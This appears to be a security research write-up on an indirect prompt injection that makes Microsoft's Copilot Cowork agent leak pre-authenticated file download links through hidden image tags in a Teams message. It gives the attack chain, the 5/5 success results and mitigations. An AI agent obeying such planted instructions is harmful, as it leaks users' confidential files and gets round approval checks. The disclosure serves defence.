Microsoft Copilot Cowork Exfiltrates Files
Source: Hacker News
This attack achieved a high success rate against state‑of‑the‑art models, including Claude Opus 4.7.
Overview
Copilot Cowork is a Frontier feature available now in Microsoft 365. It operates with the user’s Microsoft permissions and can use Microsoft Graph to read and act on data in the tenant.
In this article we demonstrate that, through an indirect prompt injection in a poisoned skill, attackers can exfiltrate files from M365. The attack exploits the fact that, unlike other sensitive actions, sending e‑mail or Teams messages to the active user does not require human approval. Opening the compromised messages in Teams or Outlook can trigger attacker‑controlled network requests.
This risk shows that giving agents access to multiple systems expands the prompt‑injection attack surface. In isolation the agent’s intended capabilities are benign; however, because of the integrated systems, users are at risk. This is reminiscent of our previous work on how URL previews in communications apps have become an egress surface for agents.
Since this risk pertains to the design of a system in which agents act with delegated authority across an entire enterprise ecosystem—rather than to a specific bug—we are publicising the work to inform users of the risks they accept by using an agentic product of this nature.
Separate from this risk, we have disclosed a vulnerability to Microsoft that directly allows data egress from Copilot Cowork’s sandbox environment.
The Attack Chain
Microsoft’s documentation on action approvals states:
“Copilot Cowork asks for your permission before taking sensitive actions, like sending an e‑mail or posting a message in Teams.”
In practice, when the recipient is the active user, these actions execute immediately without requiring human approval (users have no setting to modify this behaviour). Because these messages can contain external images that trigger network requests, data can be exfiltrated when a user opens a compromised message sent by the agent. Copilot Cowork can retrieve pre‑authenticated download links for files the user has access to; anyone who opens such a link can download the file. A manipulated agent can therefore exfiltrate files by leaking those links.
Below is the step‑by‑step chain.
-
Victim has access to files stored in SharePoint or OneDrive containing PII & financial data
-
Victim uploads a skill file to Copilot Cowork that contains a prompt injection
For general use cases this is common—a user finds a file online and uploads it as a skill. The attack is not dependent on the injection source; other sources include (but are not limited to) web data from Claude for Chrome, connected MCP servers, etc.
Note: Admins have limited oversight of “Skills”, as they are automatically loaded from a specific path in a user’s OneDrive. -
Victim asks Microsoft Copilot Cowork to review what they worked on that week, triggering the skill
-
The injection manipulates Copilot Cowork to post a Teams message that exfiltrates pre‑authenticated file download links when viewed
The injection tells Copilot Cowork that a service exists to create document previews for the recap message. To do this, the agent retrieves pre‑authenticated download links for each file and passes those URLs as query parameters to an attacker‑controlled site via malicious HTML “ tags.
At no point in this process is human approval required. -
The malicious message content is never visible, even when the Teams action is clicked
Expanding the “Task complete” block shows the agent’s actions, but the payload remains hidden.
-
When the user opens the Teams message, the pre‑authenticated download links are exfiltrated; the attacker can download the files by visiting the links
Mitigating Risks for Your Organization
Copilot Cowork has read access to essentially any resource a user can reach through Microsoft Graph. The primary mechanism to reduce the blast radius of attacks like this is to restrict excessive permissioning across the Microsoft ecosystem.
Restrict pre‑authenticated download links
-
Block file downloads from SharePoint (run in the SharePoint Online Management Shell):
Set-SPOSite -Identity <SiteUrl> -BlockDownloadPolicy $true -
Block based on a sensitivity label:
Set-Label -Identity <LabelName> -AdvancedSettings @{BlockDownloadPolicy = "true"}
Note: This configuration impacts functionality. According to the Microsoft documentation, for files under the
BlockDownloadPolicy“Users have browser‑only access with no ability to download, print, or sync files. They also can’t access content through apps, including the Microsoft 365 Apps (Word, Excel, PowerPoint, etc.).”
Model‑Agnostic Exploitation
(The original content cuts off here; the cleaned version preserves the heading for completeness.)
Model Selection and Attack Validation
The initial test was run with the model‑selection set to auto, which dynamically routes between Claude Opus 4.7 and Claude Sonnet 4.6. We later verified that the same injection works on the more advanced Opus 4.7 model when it is selected directly.
Opus 4.7 proved more thorough in its search for recently edited documents. It expanded exfiltration to include:
- Every document used in previous Cowork Copilot sessions that week.
- Files stored in typical document locations that were discovered when the model was set to
auto.
Prompt Injection Efficacy
- The prompt injection showed very high efficacy: Copilot Cowork completed the entire attack chain on all 5 trials (5 / 5).
- Success was independent of the user‑query wording—whenever the model invoked the skill, the injection succeeded.
- The injection comprised 5 lines within an 81‑line skill file, each line comparable in length to the surrounding code.
This demonstrates that even with the latest models and only a small excerpt of malicious text, an indirect prompt injection can hijack agent behavior.
Takeaway: Exercise caution when handling untrusted data (e.g., skills shared online), especially when that data is incorporated into a trusted context such as a skill file.
Scheduled Tasks Exacerbate Risks
In Copilot Cowork, users can create scheduled tasks—prompts that run on a recurring basis without user oversight. The “weekly review” behavior described in this article is precisely the type of task a user might automate.
- Scheduled tasks increase the attack surface because the user is not present to halt malicious workflows.
- Prompt injections can therefore execute repeatedly, compounding the risk.